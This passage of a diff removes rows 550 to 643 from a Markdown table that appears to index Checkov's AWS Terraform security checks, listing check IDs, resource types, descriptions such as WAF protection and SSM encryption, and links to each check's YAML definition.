-|  550 | CKV2_AWS_28     | resource | aws_alb                                                 | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                             |
-|  551 | CKV2_AWS_28     | resource | aws_lb                                                  | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                             |
-|  552 | CKV2_AWS_29     | resource | aws_api_gateway_rest_api                                | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                             |
-|  553 | CKV2_AWS_29     | resource | aws_api_gateway_stage                                   | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                             |
-|  554 | CKV2_AWS_30     | resource | aws_db_instance                                         | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                               |
-|  555 | CKV2_AWS_30     | resource | aws_db_parameter_group                                  | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                               |
-|  556 | CKV2_AWS_31     | resource | aws_wafv2_web_acl                                       | Ensure WAF2 has a Logging Configuration                                                                                                                                                                  | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml)                                                                                         |
-|  557 | CKV2_AWS_32     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution has a response headers policy attached                                                                                                                                    | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml)                                           |
-|  558 | CKV2_AWS_33     | resource | aws_appsync_graphql_api                                 | Ensure AppSync is protected by WAF                                                                                                                                                                       | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml)                                                                     |
-|  559 | CKV2_AWS_34     | resource | aws_ssm_parameter                                       | AWS SSM Parameter should be Encrypted                                                                                                                                                                    | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml)                                               |
-|  560 | CKV2_AWS_35     | resource | aws_route                                               | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                   |
-|  561 | CKV2_AWS_35     | resource | aws_route_table                                         | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                   |
-|  562 | CKV2_AWS_36     | resource | aws_ssm_parameter                                       | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                 |
-|  563 | CKV2_AWS_36     | resource | data.http                                               | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                 |
-|  564 | CKV2_AWS_37     | resource | aws                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  565 | CKV2_AWS_37     | resource | aws_accessanalyzer_analyzer                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  566 | CKV2_AWS_37     | resource | aws_acm_certificate                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  567 | CKV2_AWS_37     | resource | aws_acm_certificate_validation                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  568 | CKV2_AWS_37     | resource | aws_acmpca_certificate_authority                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  569 | CKV2_AWS_37     | resource | aws_ami                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  570 | CKV2_AWS_37     | resource | aws_ami_copy                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  571 | CKV2_AWS_37     | resource | aws_ami_from_instance                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  572 | CKV2_AWS_37     | resource | aws_ami_launch_permission                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  573 | CKV2_AWS_37     | resource | aws_api_gateway_account                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  574 | CKV2_AWS_37     | resource | aws_api_gateway_api_key                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  575 | CKV2_AWS_37     | resource | aws_api_gateway_authorizer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  576 | CKV2_AWS_37     | resource | aws_api_gateway_base_path_mapping                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  577 | CKV2_AWS_37     | resource | aws_api_gateway_client_certificate                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  578 | CKV2_AWS_37     | resource | aws_api_gateway_deployment                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  579 | CKV2_AWS_37     | resource | aws_api_gateway_documentation_part                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  580 | CKV2_AWS_37     | resource | aws_api_gateway_documentation_version                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  581 | CKV2_AWS_37     | resource | aws_api_gateway_domain_name                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  582 | CKV2_AWS_37     | resource | aws_api_gateway_gateway_response                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  583 | CKV2_AWS_37     | resource | aws_api_gateway_integration                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  584 | CKV2_AWS_37     | resource | aws_api_gateway_integration_response                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  585 | CKV2_AWS_37     | resource | aws_api_gateway_method                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  586 | CKV2_AWS_37     | resource | aws_api_gateway_method_response                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  587 | CKV2_AWS_37     | resource | aws_api_gateway_method_settings                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  588 | CKV2_AWS_37     | resource | aws_api_gateway_model                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  589 | CKV2_AWS_37     | resource | aws_api_gateway_request_validator                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  590 | CKV2_AWS_37     | resource | aws_api_gateway_resource                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  591 | CKV2_AWS_37     | resource | aws_api_gateway_rest_api                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  592 | CKV2_AWS_37     | resource | aws_api_gateway_stage                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  593 | CKV2_AWS_37     | resource | aws_api_gateway_usage_plan                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  594 | CKV2_AWS_37     | resource | aws_api_gateway_usage_plan_key                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  595 | CKV2_AWS_37     | resource | aws_api_gateway_vpc_link                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  596 | CKV2_AWS_37     | resource | aws_apigatewayv2_api                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  597 | CKV2_AWS_37     | resource | aws_apigatewayv2_api_mapping                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  598 | CKV2_AWS_37     | resource | aws_apigatewayv2_authorizer                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  599 | CKV2_AWS_37     | resource | aws_apigatewayv2_deployment                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  600 | CKV2_AWS_37     | resource | aws_apigatewayv2_domain_name                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  601 | CKV2_AWS_37     | resource | aws_apigatewayv2_integration                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  602 | CKV2_AWS_37     | resource | aws_apigatewayv2_integration_response                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  603 | CKV2_AWS_37     | resource | aws_apigatewayv2_model                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  604 | CKV2_AWS_37     | resource | aws_apigatewayv2_route                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  605 | CKV2_AWS_37     | resource | aws_apigatewayv2_route_response                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  606 | CKV2_AWS_37     | resource | aws_apigatewayv2_stage                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  607 | CKV2_AWS_37     | resource | aws_apigatewayv2_vpc_link                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  608 | CKV2_AWS_37     | resource | aws_app_cookie_stickiness_policy                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  609 | CKV2_AWS_37     | resource | aws_appautoscaling_policy                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  610 | CKV2_AWS_37     | resource | aws_appautoscaling_scheduled_action                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  611 | CKV2_AWS_37     | resource | aws_appautoscaling_target                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  612 | CKV2_AWS_37     | resource | aws_appmesh_mesh                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  613 | CKV2_AWS_37     | resource | aws_appmesh_route                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  614 | CKV2_AWS_37     | resource | aws_appmesh_virtual_node                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  615 | CKV2_AWS_37     | resource | aws_appmesh_virtual_router                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  616 | CKV2_AWS_37     | resource | aws_appmesh_virtual_service                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  617 | CKV2_AWS_37     | resource | aws_appsync_api_key                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  618 | CKV2_AWS_37     | resource | aws_appsync_datasource                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  619 | CKV2_AWS_37     | resource | aws_appsync_function                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  620 | CKV2_AWS_37     | resource | aws_appsync_graphql_api                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  621 | CKV2_AWS_37     | resource | aws_appsync_resolver                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  622 | CKV2_AWS_37     | resource | aws_athena_database                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  623 | CKV2_AWS_37     | resource | aws_athena_named_query                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  624 | CKV2_AWS_37     | resource | aws_athena_workgroup                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  625 | CKV2_AWS_37     | resource | aws_autoscaling_attachment                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  626 | CKV2_AWS_37     | resource | aws_autoscaling_group                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  627 | CKV2_AWS_37     | resource | aws_autoscaling_lifecycle_hook                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  628 | CKV2_AWS_37     | resource | aws_autoscaling_notification                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  629 | CKV2_AWS_37     | resource | aws_autoscaling_policy                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  630 | CKV2_AWS_37     | resource | aws_autoscaling_schedule                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  631 | CKV2_AWS_37     | resource | aws_backup_plan                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  632 | CKV2_AWS_37     | resource | aws_backup_selection                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  633 | CKV2_AWS_37     | resource | aws_backup_vault                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  634 | CKV2_AWS_37     | resource | aws_batch_compute_environment                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  635 | CKV2_AWS_37     | resource | aws_batch_job_definition                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  636 | CKV2_AWS_37     | resource | aws_batch_job_queue                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  637 | CKV2_AWS_37     | resource | aws_budgets_budget                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  638 | CKV2_AWS_37     | resource | aws_cloud9_environment_ec2                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  639 | CKV2_AWS_37     | resource | aws_cloudformation_stack                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  640 | CKV2_AWS_37     | resource | aws_cloudformation_stack_set                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  641 | CKV2_AWS_37     | resource | aws_cloudformation_stack_set_instance                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  642 | CKV2_AWS_37     | resource | aws_cloudfront_distribution                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  643 | CKV2_AWS_37     | resource | aws_cloudfront_origin_access_identity                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
